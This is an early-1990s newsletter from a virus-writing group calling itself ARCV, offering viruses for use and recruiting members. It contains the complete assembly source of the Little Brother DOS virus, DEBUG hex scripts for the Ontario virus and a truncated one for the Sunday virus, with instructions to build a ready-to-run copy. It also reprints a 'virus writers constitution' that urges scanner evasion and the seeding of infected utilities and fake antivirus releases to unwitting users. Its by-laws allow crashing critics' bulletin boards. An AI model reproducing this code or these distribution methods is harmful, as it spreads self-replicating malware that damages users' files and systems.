The �� ��� ��� � � ���� ���� � � � � � � � �� � ��� � ���� � ����The Association of Really Cruel Viruses.��Ŀ ������������������������������������������������ Welcome to the first ARCV Newsletter.... We hope you are all having a Spiffing Time out there.... First lets introduce the 'Team'. The Keyboard Basher - Apache Warrior. The Other One - ICE-9. Well you may or may not know that we here are one the only Truly English Computer Underground Organisation (And just to piss off the Americans Out there we will spell everything with an 's' not a 'z'). In this and future newsletters we will be dodging Special Branch and New Scotland Yard as we go, as well as putting in the odd virus ASM file, Debug Dump for you all to have fun with. We will also provide information on what's happening (DUDE) out there in Computer Land. Contents. 000..........................................................Contents. 001...................................Virus Spotlight, Little Brother. 002............................................ARCV Application Forms. 003.........................What is The ARCV, and Who are its Members. 004.....................................................Ontario Virus. 005......................................................Sunday Virus. 006...........................................................Closing. The file in the Archive ARCVVIR.COM is a self displaying List of all the ARCV Viruses we have produced. (Requires ANSI.SYS) Greetings...To The Guy Who Wrote CHAOS - Thanks Bud The Guy Who Wrote FU MANCHU - Are you English? Patti 'VSUM' Hoffman - We are here to make your Life HELL! John McAfee - To Think if wasn't for us you'd be Unemployed The Guy Who Wrote MICHELANGELO - Geta LIFE!!!!!!!!!!!!! Terry Pratchett - You Are COOOOOOOOL! And Are Carnivorous Plants Really that Boring? ARCV NEWS 001. - Virus Spotlight - Little Brother. Now this virus, is rather crafty as is relies on good old MSDOS program handling to work, ie. The Fact that .COM files are allways load before .EXE files. First lets see what Patti has to say. Virus Name: Little Brother Aliases: V Status: Rare Discovered: October, 1991 Symptoms: 307 byte .COM files Origin: The Netherlands Eff Length: 307 Bytes Type Code: SRCE - Spawning Resident .EXE Infector Detection Method: ViruScan, AVTK 5.54+, F-Prot 2.03+, Novi 1.1d+ Removal Instructions: Delete infected .COM programs General Comments: The Little Brother virus was submitted from the Netherlands in October, 1991. This virus is a spawning virus similar in technique to the Aids 2 and Twin-351 viruses. The first time a program infected with Little Brother is executed, Little Brother will become memory resident in a "hole" in low system memory in the system data area, hooking interrupt 21. There will be no change in total system or available free memory. Once resident, the Little Brother virus will infect .EXE programs when they are executed. The .EXE program itself will not be altered, but a corresponding .COM program will be created by the virus of 307 bytes. This corresponding.COM program will contain pure virus code and have a date/time stamp in the DOS directory of when it was created. The following text strings can be found in the 307 byte .COM files: "Little Brother" "EXE COM" Since DOS will execute .COM programs before .EXE programs, whenever the user attempts to execute a .EXE program, the corresponding .COM program will be executed first. The .COM program, when finished will then start the .EXE program the user was attempting to execute. Well lets get to the Asm source. --------------------------------------------------------------------------- cseg segment assume cs:cseg,ds:cseg,es:nothing org 100h FILELEN equ quit - begin RESPAR equ (FILELEN/16) + 17 VER_ION equ 1 oi21 equ quit nameptr equ quit+4 DTA equ quit+8 .RADIX 16 ;************************************************************************** ;* Start the program! ;************************************************************************** begin: cld mov ax,0DEDEh ;already installed? int 21h cmp ah,041h je cancel mov ax,0044h ;move program to empty hole mov es,ax mov di,0100h mov si,di mov cx,FILELEN rep movsb mov ds,cx ;get original int21 vector mov si,0084h mov di,offset oi21 movsw movsw push es ;set vector to new handler pop ds mov dx,offset ni21 mov ax,2521h int 21h cancel: ret ;************************************************************************** ;* File-extensions ;************************************************************************** EXE_txt db 'EXE',0 COM_txt db 'COM',0 ;************************************************************************** ;* Interupt handler 24 ;************************************************************************** ni24: mov al,03 iret ;************************************************************************** ;* Interupt handler 21 ;************************************************************************** ni21: pushf cmp ax,0DEDEh ;install-check ? je do_DEDE push dx push bx push ax push ds push es cmp ax,4B00h ;execute ? jne exit doit: call infect exit: pop es pop ds pop ax pop bx pop dx popf jmp dword ptr cs:[oi21] ;call to old int-handler do_DEDE: mov ax,04100h+VER_ION ;return a signature popf iret ;************************************************************************** ;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) ;************************************************************************** infect: cld mov word ptr cs:[nameptr],dx ;save the ptr to the ;filename mov word ptr cs:[nameptr+2],ds push cs ;set new DTA pop ds mov dx,offset DTA mov ah,1Ah int 21 call searchpoint mov si,offset EXE_txt ;is extension 'EXE'? mov cx,3 rep cmpsb jnz do_com do_exe: mov si,offset COM_txt ;change extension to COM call change_ext mov ax,3300h ;get ctrl-break flag int 21 push dx xor dl,dl ;clear the flag mov ax,3301h int 21 mov ax,3524h ;get int24 vector int 21 push bx push es push cs ;set int24 vec to new handler pop ds mov dx,offset ni24 mov ax,2524h int 21 lds dx,dword ptr [nameptr] ;create the file (unique ;name) xor cx,cx mov ah,5Bh int 21 jc return1 xchg bx,ax ;save handle push cs pop ds mov cx,FILELEN ;write the file mov dx,offset begin mov ah,40h int 21 cmp ax,cx pushf mov ah,3Eh ;close the file int 21 popf jz return1 ;all bytes written? lds dx,dword ptr [nameptr] ;delete the file mov ah,41h int 21 return1: pop ds ;restore int24 vector pop dx mov ax,2524h int 21 pop dx ;restore ctrl-break flag mov ax,3301h int 21 mov si,offset EXE_txt ;change extension to EXE call change_ext return: ret do_com: call findfirst ;is the file a virus? cmp word ptr cs:[DTA+1Ah],FILELEN jne return mov si,offset EXE_txt ;does the EXE-variant exist? call change_ext call findfirst jnc return mov si,offset COM_txt ;change extension to COM jmp short change_ext ;************************************************************************** ;* Find the file ;************************************************************************** findfirst: lds dx,dword ptr [nameptr] mov cl,27h mov ah,4Eh int 21 ret ;************************************************************************** ;* change the extension of the filename (CS:SI -> ext) ;************************************************************************** change_ext: call searchpoint push cs pop ds movsw movsw ret ;************************************************************************** ;* search begin of extension ;************************************************************************** searchpoint: les di,dword ptr cs:[nameptr] mov ch,0FFh mov al,'.' repnz scasb ret ;************************************************************************** ;* Text and Signature ;************************************************************************** db 'Little Brother',0 quit: cseg ends end begin Quite a Simple idea for a virus but it works. Apche.ARCV NEWS 002. Well I thought it could be a good idea if I put in the relevant ARCV Application forms for any one who may wish to join the ranks of the ARCV. At the moment we are looking for MAC Virus programmers, and AMIGA Virus Programmers and others. Also we are looking Couriers for the ARCV (BBS's for Distribution), that are based all over the world in Britain, USA and Eastern Europe Mainly but other countries will get equal consideration. so less of the waffle and to the Applications. --------------------------------------------------------------------------- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- /////// //////// ///////// // // // // // // // // // /////// /////// // // // // // // // // // // // // * // // * ///////// * /// THE ASSOCIATION OF REALLY CRUEL VIRUSES -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The Association of Really Cruel Viruses Courier and/or Membership Application Form For any purpose other than to evaluate this application, the data in all sections of this application shall not be disclosed outside the internal leadership of the ARCV. For more ARCV information please see ARCV prologue. --------------------------------------------------------------------------- FALSE STATEMENT: A person is guilty of False Statement when he/she Intentionally makes a false statement under oath or pursuant to a form bearing Notice. You are here to fore-warned... FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! --------------------------------------------------------------------------- PART A: Background Information 1. Date of Application:__________________________________ 2. Applicants Name (Last,First,Middle,Maiden): ______________________________________________________ 3. Applicants Current Handle:____________________________ 4. List all other Handles by which you have been known. ______________________________________________________ ______________________________________________________ 5. Residence Address (Number,Street,City or Town,County and Post Code): _______________________________________________________ _______________________________________________________ _______________________________________________________ 6. Home Telephone Number (Area Code and Number): _______________________________________________________ 7. Home Data Number (Area Code and Number): _______________________________________________________ 8. Fidonet Contact address (full address, including name to contact): _______________________________________________________ _______________________________________________________ 9. Age:__________ Date of Birth:_________________________ 10. Marital Status: ___ Married ___ Separated ___ Single ___ Divorced 11. Nationality __________________________________________ 12. Have you at any time used a virus? YES/NO ____________ If Yes, explain: _____________________________________ ______________________________________________________ ______________________________________________________ 13. Have you at any time been the victim of a virus attack? YES/NO _________________ If yes, explain: _____________________________________ ______________________________________________________ ______________________________________________________ Part B: Legal Information 1. Have You ever been convicted in any court of a crime punishable by imprisonment for a term exceeding 1 year? No _____ Yes ____ If yes, explain: _____________________________ _______________________________________________________ _______________________________________________________ 2. Are you currently on Probation,Parole,a Work-Release Program or Released on Personal Recognizance or Bond Pending Court Action? No _____ Yes ____ If yes, explain: ______________________________ _______________________________________________________ _______________________________________________________ 3. Are you Now or ever have been a member of any form of Law Enforcement Agency, Such as: FBI,Secret Service,NSA, CIA,BATF,State or Local Police,Special Branch etc.? No _____ Yes ____ If yes, explain: _____________________________ _______________________________________________________ _______________________________________________________ 4. Are you Now or ever have been a member of any form of group that investigates the Computer Underground? Such as: Software Publishers Association,etc. No _____ Yes ____ If yes, explain: _____________________________ _______________________________________________________ _______________________________________________________ 5. Do you belong To any Organized Computer Club or Group? No _____ Yes ____ If yes, explain: _____________________________ _______________________________________________________ _______________________________________________________ Part C: ARCV Information 1. Are you applying to be: An ARCV Member __________ An ARCV Courier __________ Both __________ 2. If applying to be a member, Explain in detail your reason for wanting to be a member of the ARCV. _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ _____________________________________________________________________ 3. What kind of position do you wish to hold in the ARCV? ____________________________________________________________________ ____________________________________________________________________ ____________________________________________________________________ Part D: Qualifications 1. Which Programming languages do you know WELL? (Place X in Boxes) [ ] Assembler [ ] Basic [ ] Cobol [ ] C (Turbo, Ansi) [ ] Fortran [ ] Pascal (Turbo, Others) 2. Which Programming languages are you familiar which (Place x in Boxes) [ ] Assembler [ ] Basic [ ] Cobol [ ] C (Turbo, Ansi) [ ] Fortran [ ] Pascal (Turbo, Others) 3. Have you ever written a virus? (No Trojans Please) No _______ Yes ______ If yes, explain: ___________________________ _______________________________________________________ _______________________________________________________ _______________________________________________________ 4. If you answered NO to the above DON'T answer this... Has the virus you've written in the Public Domain? (ie. Is it released?) No _______ Yes ______ If yes, explain: ___________________________ _______________________________________________________ _______________________________________________________ _______________________________________________________ 5. If you've written a virus are you willing for it to be placed in our virus library? No _______ Yes ______ 6. Do you have a virus collection? No _______ Yes ______ If yes, explain (Please included number in collection) _______________________________________________________ _______________________________________________________ _______________________________________________________ ________________________________________________________ ARCV By-Laws: --------------------------------------------------------------------------- Section 1A-1 ALL MEMBERS OF THE ARCV MUST SUBSCRIBE TO THE HACKERS ETHIC AS DEFINED BY THE EARLY CRAFTERS OF THE ART. (See Appendix A) ALSO YOU MUST SUBSCRIBE TO THE VIRUS WRITERS CONSTITUTION. (See Appendix B) --------------------------------------------------------------------------- Section 1a-2 DEFENSE OF COPARTICIPANTS IN OFFENSE WITH A COMPUTER In any prosecution for any Crime under Law, in which the member was not the only participant, it shall be recognized that no ARCV member shall provide information on any current ARCV member to any member of the Media or Law Enforcement Agencies. --------------------------------------------------------------------------- Section 1a-3 USE OF DEADLY HACKING FORCE Except as provided in these sub-sections, No ARCV member shall ever damage delete or in any way tamper with a computer network or system. Exception 1a-3-1 : Any BBS or system posting or providing Anti-ARCV propaganda may be crashed or deleted. Exception 1a-3-2 : Any BBS or system posting or providing any ARCV members phone numbers,Password, or personal information may be crashed or deleted. Exception 1a-3-3 : Any system so approved by the ARCV Council. --------------------------------------------------------------------------- Section 1a-4 DISCLOSURE OF PROPRIETARY INFORMATION No ARCV member shall distribute confidential ARCV information. This shall include: Disks,Programs,Files,Passwords or Codes,Paperwork, Manuals,Documents to any Non ARCV member,Media Member, or Law Enforcement Agency, Without the prior permission of the ARCV Council. --------------------------------------------------------------------------- Section 1a-5 CONTRIBUTION OF INFORMATION All ARCV Members are expected to contribute to the ARCV as a whole, and to provide information obtained on their own. Members shall not just use information provided by other members or non-members. --------------------------------------------------------------------------- Section 1a-6 DISCLOSURE OF MEMBERSHIP All ARCV members will not allow any Non-member to use his/her password, ID,Handle or name. And No member shall post or provide any members name password or phone number on any computer system without the prior consent of said member. All members will leave his/her name or phone number on a system or network at their own discretion and risk. --------------------------------------------------------------------------- APPENDIX A: 1. All Information should be FREE! 2. Promote Decentralization - Mistrust Authority 3. Access to computers should be unlimited and Total 4. Hackers should be judged by their hacking ability 5. You can create art and beauty on a computer 6. Computers can change your life for the better. ___________________________________________________________________________ APPENDIX B: *** ������������������������������������������� The Constitution of Worldwide Virus Writers ������������������������������������������� Initial Release - February 12, 1992 ������������������������������������������� ARTICLE I - REGARDING ORIGINAL VIRII Section A - DEFINITION The term "original virus" herein indicates programming done exclusively by either one individual or group, with no code taken from any other source, be it a book or another virus. Section B - CODE REQUIREMENTS For an original virus to conform to the standards set by this document, it must include the following: 1) The title of the virus in square brackets followed by a zero byte should be in the code, in a form suitable for inclusion into SCAN(1). This is to ensure that the name of the virus is known to those examining it. 2) The name of the author and his/her group affiliation/s should be included in the code, followed by a zero byte. At the present, this is an optional requirement. 3) Some form of encryption or other form of stealth techniques must be used. Even a simple XOR routine will suffice. 4) If the virus infects files, the code should be able to handle infection of read only files. 5) It must have some feature to distinguish it from other virii. Creativity is encouraged above all else. 6) The virus must not be detectable by SCAN. Section C - IMPLEMENTATION This section, and all sections hereafter bearing the heading "IMPLEMENTATION" refer to the recommended method of implementation of the suggestions/requirements listed in the current article. 1) Virus_Name db '[Avocado]',0 2) Author db 'Dark Angel, PHALCON/SKISM',0 ARTICLE II - REGARDING "HACKED" VIRII Section A - DEFINITION The term "hacked virus" herein refers to any virus written by either one individual or a group which includes code taken from any other source, be it a book, a code fragment, or the entire source code from another virus. The term "source virus" herein refers to the virus which spawned the "hacked virus." Section B - CODE REQUIREMENTS For a "hacked" virus to conform to the standards set forth by this document, it must include the following, in addition to all the requirements set down in Article I of this document: 1) The title, author (if available), and affiliation of the author (if available) of the original virus. 2) The author of the hacked virus must give the source code of said virus to the author of the source virus upon demand. 3) No more Jerusalem, Burger, Vienna, Stoned, and Dark Avenger hacks are to be written. 4) The source virus must be improved in some manner (generally in efficiency of speed or size). 5) The hacked virus must significantly differ from the source virus, i.e. it cannot be simply a text change. Section C - IMPLEMENTATION 1) Credit db 'Source stolen from Avocado by Dark Angel of PHALCON/SKISM',0 ARTICLE III - REGARDING VIRAL STRAINS Section A - DEFINITION The term "viral strain" herein refers to any virus written by the original author which does not significantly differ from the original. It generally implies a shrinking in code size, although this is not required. Section B - CODE REQUIREMENTS For a "viral strain" to conform to the standards set by this document, it must include the following, in addition to all the requirements set down in Article I of this document: 1) The name of the virus shall be denoted by the name of the original virus followed by a dash and the version letter. 2) The name of the virus must not change from that of the original strain. 3) A maximum of two strains of the virus can be written. Section C - IMPLEMENTATION 1) Virus_Name db '[Avocado-B]',0 ARTICLE IV - DISTRIBUTION Section A - DEFINITION The term "distribution" herein refers to the transport of the virus through an infected file to the medium of storage of a third (unwitting) party. Section B - INFECTION MEDIUM The distributor shall infect a file with the virus before uploading. Suggested files include: 1) Newly released utility programs. 2) "Hacked" versions of popular anti-viral software, i.e. the version number should be changed, but little else. 3) Beta versions of any program. The infected file, which must actually do something useful, will then be uploaded to a board. The following boards are fair game: 1) PD Boards 2) Lamer boards 3) Boards where the sysop is a dick No virus shall ever be uploaded, especially by the author, directly to an antivirus board, such as HomeBase or Excalibur. Section C - BINARY AND SOURCE CODE AVAILABILITY The binary of the virus shall not be made available until at least two weeks after the initial (illicit) distribution of the virus. Further, the source code, which need not be made available, cannot be released until the latest version of SCAN detects the virus. The source code, should it be made available, should be written in English. Section D - DOCUMENTATION Documentation can be included with the archive containing the binary of the virus, although this is optional. The author should include information about the virus suitable for inclusion in the header of VSUM(2). A simple description will follow, though the author need not reveal any "hidden features" of the virus. Note this serves two purposes: 1) Enable others to effectively spread the virus without fear of self-infection. 2) Ensure that your virus gets a proper listing in VSUM. ARTICLE V - AMENDMENTS Section A - PROCEDURE To propose an amendment, you must first contact a PHALCON/SKISM member through one of our member boards. Leave a message to one of us explaining the proposed change. It will then be considered for inclusion. A new copy of the Constitution will then be drafted and placed on member boards under the filename "PS-CONST.TXT" available for free download by all virus writers. Additionally, an updated version of the constitution will be published periodically in our newsletter. Section B - AMENDMENTS None as of this writing. ARTICLE VI - MISCELLANEOUS Section A - WHO YOU CAN MAKE FUN OF This is a list of people who, over the past few years, have proved themselves to be inept and open to ridicule. 1) Ross M. Greenberg, author of FluShot+ 2) Patricia (What's VSUM?) Hoffman. 2) People who post "I am infected by Jerusalem, what do I do?" or "I have 20 virii, let's trade!" 3) People who don't know the difference between a virus and a trojan. 4) Lamers and "microwares puppies" Section B - WHO YOU SHOULDN'T DIS TOO BADLY This is a list of people who, over the past few years, have proved themselves to be somewhat less inept and open to ridicule than most. 1) John McAfee, nonauthor of SCAN 2) Dennis, true author of SCAN Section C - MOTIVATION In most cases, the motivation for writing a virus should not be the pleasure of seeing someone else's system trashed, but to test one's programming abilities. ���������� 1 SCAN is a registered trademark of McAfee Associates. 2 VSUM is a registered trademark of that bitch who doesn't know her own name. ___________________________________________________________________________ For those applying for courier membership if we feel you are suitable we will be in touch to discus the extra details. The usual first contact will be by means of a Fidonet address or a written letter. For those applying for normal membership then will contact you at your Fidonet address, with the extra details of the membership and a list of board that's we can be contacted through. ___________________________________________________________________________ FALSE STATEMENT: A person is guilty of False Statement when he/she Intentionally makes a false statement under oath or pursuant to a form bearing Notice. You are here to fore-warned... FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! I agree to the By-Laws and statements put forth on this document NAME: _______________________________ DATE: _______________________________ To return your Application please return to Apache Warrior. Through E- Mail on any Flashback BBS or the BBS where you got this from. Please fill in the Machine Configuration data sheet and return to the above address. *** PS. Thanks to PHALCON/SKISM for preparing the Virus Writers Constitution. *** --------------------------------------------------------------------------- The ARCV'92 May the Great A'Tuin keep going........ --------------------------------------------------------------------------- Well that's the Application form next is the machine spec. form. This gives us an indication of the kind of computer system you run. --------------------------------------------------------------------------- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- /////// //////// ///////// // // // // // // // // // /////// /////// // // // // // // // // // // // // * // // * ///////// * /// THE ASSOCIATION OF REALLY CRUEL VIRUSES -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The Association of Really Cruel Viruses. Machine Configuration Form. Please fill in all the questions truthfully as they will help us decide what you can offer our group. ___________________________________________________________________________ 1. Date of Application:__________________________________ 2. Applicants Name (Last,First,Middle,Maiden): ______________________________________________________ 3. Applicants Current Handle:____________________________ 4. Machine Type. (Place an X in the boxes appropriate) [ ] IBM PC. [ ] AMIGA. [ ] ATARI ST. [ ] MAC. [ ] ARCHIMEDES. [ ] OTHER, (Please State). 5. If you answered IBM PC to the above please answer below. What type of IBM PC do you have. [ ] 8086/88 Based [ ] 80286 Based [ ] 80386 (SX/DX) Based [ ] 80486 (SX/DX/DX2) Based [ ] PS/2 6. If you have a machine other than that of an IBM PC please state processor type and manufacturer. _______________________________________________________________ _______________________________________________________________ _______________________________________________________________ 7. Do you have any of the following equipment. [ ] Hard Disk, enter size and type: ______________________________ ______________________________________________________________ [ ] Modem, enter model and max speed: ____________________________ ______________________________________________________________ [ ] Printer [ ] 9 pin Dot Matrix [ ] 24 pin Dot Matrix [ ] Laser Printer [ ] Ink Jet type [ ] Colour [ ] Monochrome Display. [ ] CGA Display, or equivalent. [ ] EGA Display, or equivalent. [ ] VGA Display, or equivalent. [ ] SVGA Display, or equivalent. [ ] 5� inch 360K floppy. [ ] 5� inch 1.2Mb floppy. [ ] 3� inch 720Kb floppy. [ ] 3� inch 1.44Mb floppy. [ ] Other Please State: __________________________________________ 8. What Kind of Anti-Virus Software do you use: _______________________________________________________________ _______________________________________________________________ 9. Do you believe in Virus Research? YES/NO _______________________ 10. Do you Hack? YES/NO ___________________________________________ 11. If so what kind of Systems? ___________________________________ _______________________________________________________________ 12. Do you run a BBS? YES/NO ______________________________________ 13. If so please state BBS configuration. inc. Software, Machines. _______________________________________________________________ _______________________________________________________________ _______________________________________________________________ _______________________________________________________________ _______________________________________________________________ 14. If you have a BBS are you willing for us to us it? YES/NO _____ ___________________________________________________________________________ This all for now and we may ask further questions regarding your computer setups. Thank you for your time. ___________________________________________________________________________ FALSE STATEMENT: A person is guilty of False Statement when he/she Intentionally makes a false statement under oath or pursuant to a form bearing Notice. You are here to fore-warned... FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! I agree to the statements put forth on this document NAME: _______________________________ DATE: _______________________________ To return your Machine Configuration data sheet please return to Apache Warrior. Through E-Mail on any Flashback BBS or the BBS where you got this from. --------------------------------------------------------------------------- The ARCV'92 Octarine - The Pigment of Imagination...... ---------------------------------------------------------------------------ARCV NEWS 003. The Association of Really Cruel Viruses. This is one of the first English Computer Underground groups, although we are an English organisation we can only be contacted through American or Eastern Europe Virus boards. Or we will contact through a Fidonet address. What is The ARCV. ARCV is a organisation that is involved in Writing and Research of computer viruses. We hold a Library of IBM Computer viruses for the use of the ARCV members. But as a group we are involved in viruses for most the main computer types (IBM PC, AMIGA, ST, MAC). We have a Bi-Monthly newsletter with the latest virus news from around the country and from around the world, virus Dis-Assemblies and other virus Debug Scripts. We have links with PHALCON/SKISM in the US, we also have links with some Eastern Europe Virus writers. Are group is not only limited to virus activities but other 'Underground' activities also (Hacking, Phreaking etc.) so any new members who don't write viruses could be involved in any of the other activities we are involved in. Are members come from the youths of today, at the moment we are mainly English students that wish to beat and know more about the system. We come from a range of backgrounds from the Electronics side and the Computer side, I myself Apache Warrior come mainly from the Electronics side but branched to the Computer side fully around 2 years ago. I Hack, Phreak and write Viruses, I am the President of the group (after all I started the group) and I am some what of an expert on beating the BT phone exchange and being a BBS A HOLIC that comes in very handy. Now ICE-9 is also a Electronics guy who turned to the computer he writes viruses and is into Heavy Metal. Now the picture put out by the Anti-Virus Authors is that Virus writers are Sad individuals who wear Anoraks and go Train Spotting but well they are sadly mistaken, we are very intelligent, sound minded, highly trained, and we wouldn't be seen in an Anorak or near an Anorak even if dead. We aim to provide the ARCV members and some Non-Members an insight to the computer underground world and would you believe it is huge. The Group is always seeking new members and we require new members to stay afloat, soon we will be opening the world HQ in the UK this will have special access areas for the ARCV members these will include access to the ARCV Virus Library, all of which are legit viruses and No Trojans.ARCV NEWS 004. The Ontario Virus Well heres a virus from Canada. V Status: Rare Discovered: July, 1990 Symptoms: .COM & .EXE growth; decrease in system and free memory; hard disk errors in the case of extreme infections Origin: Ontario, Canada Eff Length: 512 Bytes Type Code: PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+, NAV Removal Instructions: SCAN /D, or Delete infected files General Comments: The Ontario Virus was isolated by Mike Shields in Ontario, Canada in July, 1990. The Ontario virus is a memory resident infector of .COM, .EXE, and overlay files. It will infect COMMAND.COM. The first time a program infected with the Ontario Virus is executed, it will install itself memory resident above the top of system memory but below the 640K DOS boundary. Total system memory and free memory will be decreased by 2,048 bytes. At this time, the virus will infect COMMAND.COM on the C: drive, increasing its length by 512 bytes. Each time an uninfected program is executed on the system with the virus memory resident, the program will become infected with the viral code located at the end of the file. For .COM files, they will increase by 512 bytes in all cases. For .EXE and overlay files, the file length increase will be 512 - 1023 bytes. The difference in length for .EXE and overlay files is because the virus will fill out the unused space at the end of the last sector of the uninfected file with random data (usually a portion of the directory) and then append itself to the end of the file at the next sector. Systems using a sector size of more than 512 bytes may notice larger file increases for infected files. Infected files will always have a file length that is a multiple of the sector size on the disk. In the case of extreme infections of the Ontario Virus, hard disk errors may be noticed. Ontario uses a complex encryption routine, and a simple identification string will not identify this virus. --------------------------------------------------------------------------- n ontario.com e 0100 E9 1D 00 1D 66 65 63 74 65 64 20 50 72 6F 67 72 e 0110 61 6D 2E 20 0D 0A 24 BA 02 01 B4 09 CD 21 CD 20 e 0120 90 E8 E9 01 93 84 7B D9 F8 69 7C 3C 84 7B B6 A5 e 0130 71 60 0F CB 65 B7 BB 0A A3 07 55 97 7F 86 BE 9A e 0140 FF 84 55 0D E5 84 79 AA F7 1A 79 86 F7 47 30 0A e 0150 A0 05 55 87 7B 04 7B 25 69 84 56 04 7B 27 69 84 e 0160 F5 44 75 9B F0 71 48 7B C2 80 79 78 88 20 F5 5D e 0170 81 43 7D 00 7B FB 7B 27 FD 84 80 3C 84 CF B6 A5 e 0180 64 9A 7C 8F 96 F0 77 09 CD FF 7B 3B 7B 85 2C 78 e 0190 DE 21 B8 08 BB AA 7A 82 06 84 91 6F 6E CD 15 B9 e 01A0 84 7B 0E 86 3B 4B FB 78 30 F1 6F B8 78 F0 6B B8 e 01B0 84 F1 72 8A 64 3E A6 85 93 8D 7B 4B 93 81 7B AA e 01C0 84 AA 7B 86 7D 9A 29 D5 28 D4 C3 84 38 6C 5D 85 e 01D0 09 9C 8D 45 7A F0 70 04 9A 7A C3 85 38 6C 6D 85 e 01E0 09 8C C3 86 46 6C 75 85 08 87 92 86 7A 0F A3 8A e 01F0 64 3C 7B D3 93 7B 7B 0D 75 80 79 0D 6D 82 79 3E e 0200 73 86 C2 9F 7B 30 44 6C 97 84 09 CC FA BA 73 86 e 0210 36 DE 0F BD DB 8D 79 BE 7D 8F 79 F0 4C B7 A9 B7 e 0220 B2 3C 79 C6 93 4B 7B F6 50 B9 7B 64 0C A2 2B 25 e 0230 73 86 D8 FF 7B 25 71 86 D8 F9 7B DC 56 87 7B 42 e 0240 7D 8C 79 6D D8 8D 79 26 70 86 90 CD EB 07 45 98 e 0250 79 85 0E 87 92 01 7B 25 77 86 C2 84 79 73 9A D4 e 0260 29 35 7F 57 B1 57 93 87 B9 AF 7D 94 79 D4 DA 98 e 0270 79 27 00 84 DA 9A 79 81 6B 84 D8 F9 7B DC D8 9A e 0280 79 43 7D 98 79 85 7B 7B 7D 88 79 DD 21 3C 7B C6 e 0290 93 E7 7B F6 3C 04 4D 7C 7A 8C 48 44 F5 5C DB E8 e 02A0 7F 8A 64 8A 7C 26 97 85 48 72 C4 A0 79 D3 C2 84 e 02B0 79 78 88 20 C5 AC 79 6C 21 84 21 3D 7B 86 CF C4 e 02C0 93 B7 7B F6 6C B7 B2 B7 A9 3C 7B C6 93 A3 7B F6 e 02D0 70 3E 73 86 C2 9F 7B 30 3B 6C 61 84 F0 92 7D 86 e 02E0 F0 8A 7F 86 C3 85 2C 6C 77 84 CF BA 93 83 7B DC e 02F0 20 DD 21 9B 7C 47 E7 AA 84 9A 7B 86 B8 C7 41 D8 e 0300 38 CB 36 C9 3A CA 3F AA 38 CB 36 84 84 5E 56 2E e 0310 8A 84 E8 01 B9 E8 01 F6 D0 2E 30 04 46 E2 F8 C3 rcx 220 w q --------------------------------------------------------------------------- Apche.. ARCV NEWS 005. The Sunday Virus According to Patty Hoffman, the Sunday virus is based on the Jerusalem viruses, because the codes for both viruses are similar. Sunday infects COM, EXE, and OVL files, when they are executed, and it stays resident in memory. It was circulated around the Seattle, Washington area in 1989, and is very common. How ever this version of Sunday doesn't seem to print any messages on the screen, like some of the other versions do, every Sunday. This virus spreads rapidly, and is a great replicator. To create SUNDAY.COM, cut out the following code, and name the resulting file sunday.scr. Then, use this command: DEBUG < SUNDAY.SCR this will then produce the .COM all ready for use. --------------------------------------------------------------------------- n sunday.com e 0100 E9 92 00 59 57 C8 F7 E1 EE E7 00 01 4C 1E 00 00 e 0110 00 02 00 AB 00 0C 13 16 17 C7 02 BF 05 3A 1E 63 e 0120 79 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06 e 0130 5F BD 1D 80 00 00 00 80 00 BD 1D 5C 00 BD 1D 6C e 0140 00 BD 1D 00 0A 95 22 29 00 00 00 00 F0 02 00 4D e 0150 5A 87 01 14 01 ED 05 80 01 23 0B FF FF 8C 20 C0 e 0160 06 89 19 C6 00 8C 20 1E 00 00 00 00 00 00 00 00 e 0170 05 00 20 00 29 15 01 79 00 02 10 00 C0 20 02 00 e 0180 54 61 28 99 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 01 e 0190 00 00 00 00 00 FC 06 B8 00 00 8E C0 26 A1 84 00 e 01A0 07 3D 4C 02 75 10 B4 DD BF 00 01 BE C2 06 03 F7 e 01B0 2E 8B 4D 11 CD 21 8C C8 05 10 00 8E D0 BC C0 06 e 01C0 50 B8 C6 00 50 CB FC 06 2E 8C 06 31 00 2E 8C 06 e 01D0 39 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 e 01E0 00 2E 01 06 49 00 2E 01 06 45 00 B4 FF CD 21 80 e 01F0 FC 04 75 10 07 2E 8E 16 45 00 2E 8B 26 43 00 2E e 0200 FF 2E 47 00 33 C0 8E C0 BB FC 03 26 8B 07 2E A3 e 0210 4B 00 26 8A 47 02 2E A2 4D 00 26 C7 07 F3 A5 26 e 0220 C6 47 02 CB 58 05 10 00 8E C0 0E 1F B9 C2 06 D1 e 0230 E9 33 F6 8B FE 06 B8 3E 01 50 FF 2E 59 06 8C C8 e 0240 8E D0 BC C0 06 33 C0 8E D8 2E A1 4B 00 89 07 2E e 0250 A0 4D 00 88 47 02 8B DC B1 04 D3 EB 83 C3 20 83 e 0260 E3 F0 2E 89 1E 33 00 B4 4A 2E 8E 06 31 00 CD 21 e 0270 B8 21 35 CD 21 2E 89 1E 17 00 2E 8C 06 19 00 0E e 0280 1F BA 4C 02 B8 21 25 CD 21 8E 06 31 00 26 8E 06 e 0290 2C 00 33 FF B9 FF 7F 32 C0 F2 AE 26 38 05 E0 F9 e 02A0 8B D7 83 C2 03 B8 00 4B 06 1F 0E 07 BB 35 00 1E e 02B0 06 50 53 51 52 B4 0F CD 10 3C 07 74 07 2E C7 06 e 02C0 4A 02 00 B8 B8 08 35 CD 21 2E 89 1E 13 00 2E 8C e 02D0 06 15 00 0E 1F C7 06 1F 00 E0 79 B8 08 25 BA 0A e 02E0 02 CD 21 5A 59 5B 